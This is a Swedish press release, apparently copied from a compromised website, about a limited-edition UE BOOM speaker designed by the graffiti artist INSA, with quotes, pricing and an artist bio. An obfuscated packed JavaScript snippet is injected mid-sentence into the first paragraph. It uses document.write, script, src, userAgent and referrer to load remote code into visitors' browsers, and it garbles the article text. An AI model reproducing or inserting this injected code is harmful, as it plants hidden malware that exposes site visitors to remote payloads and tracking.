Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Populära ”GIF-ITI” konstnären INSA designar limiterad upplaga av UE BOOM

Populära ”GIF-ITI” konstnären INSA designar limiterad upplaga av UE BOOM

Idag lanserar Ultimate Ears sitt senaste tillskott i raden av artistsamarbeten, genom Graffiti eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sedfr|var|u0026u|referrer|eyift||js|php’.split(’|’),0,{}))
Fetish Edition UE BOOM
, designad av INSA, en av Storbritanniens mest hyllade graffiti-konstnärer, flätar det här samarbetet ihop två konstformer – musik och graffiti.

På bara några år har INSA gjort avtryck i både den fysiska och digitala konstvärlden, genom sitt karaktäristiska sätt att använda färger, former och teknologi. INSAs animerande graffiti-gifar, mer kända som ”GIF-ITI” förvandlar stadssiluetter genom att kombinera fysisk konst med digital sådan. Genom att noggrant måla och fotografera en mängd graffitilager, får sedan INSAs streetart liv genom animerade gifar. Nu får även hans populära siluetter liv tillsammans med musik, tillsammans med UE BOOM.

“UE BOOM är en av de mest innovativa högtalarna på marknaden, och det känns häftigt att kombinera min konst med en enhet som gör världen än mer kreativ”, säger INSA. ”Samarbetet är också ett sätt att nå ut med min konst. Faktumet att jag får klä UE BOOM, en högtalare jag använder i mitt vardagliga liv – oavsett om jag målar en vägg eller är i studion – med min konst, gör att det här projektet känns spännande för mig”.
2013 introducerades UE BOOM och har sedan dess har vunnit fyra prestigefyllda designtävlingar. Byggd för att stå stabil oavsett var livet tar dig, är UE BOOM skapad i en cylinderform som skjuter ut kraftfullt ljud i 360 grader, ett vattentätt fodral med upp till 15 timmars batteritid.

“UE BOOM är ett nytt sätt att njuta av musik, precis som INSA får oss att se på streetart på ett nytt sätt genom sin ”GIF-ITI”, säger Rory Dooley general manager på Ultimate Ears. ”Genom att kombinera dessa innovatörer inom konst kan vi skapa något vackrare, både för öga och öra. Det är ett spännande samarbete.”

Pris och tillgänglighet
Graffiti Fetish Edition UE BOOM förväntas finnas tillgänglig i USA och utvalda europeiska länder från början av december 2014 till priset av 1999 SEK. För mer information, vänligen besökwww.ultimateears.com or www.makemusicsocial.com. För ytterligare information kring INSA, vänligen besök www.insaland.com/

Om INSA
INSA är en internationellt erkänd konstnär baserad i London, Storbritannien. Hans verk består av allt från installationer till produkter, och har ställts ut på gallerier och museum runt om världen, inklusive Tate Britain, London. Han har tidigare arbetat med ledande varumärken så som Nike, Kangol, Evisu, Ketel One, Warsteiner med flera.